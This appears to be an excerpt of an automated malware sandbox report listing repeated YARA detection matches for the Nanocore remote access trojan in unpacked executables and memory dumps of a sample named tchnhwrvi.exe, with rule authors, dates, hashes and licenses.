      Source: 1.2.tchnhwrvi.exe.b00000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 1.2.tchnhwrvi.exe.b00000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 1.2.tchnhwrvi.exe.b00000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 1.2.tchnhwrvi.exe.b00000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4f960b1.23.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4f960b1.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.4f960b1.23.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.571891406.0000000007620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571891406.0000000007620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571891406.0000000007620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000002.00000002.571891406.0000000007620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.571954055.0000000007660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571954055.0000000007660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571954055.0000000007660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000002.00000002.571954055.0000000007660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.317149940.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.571812469.00000000075F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571812469.00000000075F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571812469.00000000075F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000002.00000002.571812469.00000000075F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.571720723.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571720723.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571720723.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000002.00000002.571720723.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.567185811.00000000043A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.567185811.0000000004404000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.571026013.0000000005E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571026013.0000000005E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571026013.0000000005E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000002.00000002.571026013.0000000005E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.571597397.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571597397.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571597397.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
